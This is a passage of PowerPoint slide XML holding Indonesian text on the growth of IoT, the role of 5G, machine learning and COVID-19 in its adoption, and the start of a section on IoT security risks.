              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjangkau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemajuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 5G dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecepatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transmisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real-time. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ledakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memunculkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecerdasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekstrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pandemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> COVID-19 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan telemedicine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun-tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendatang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> IoT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
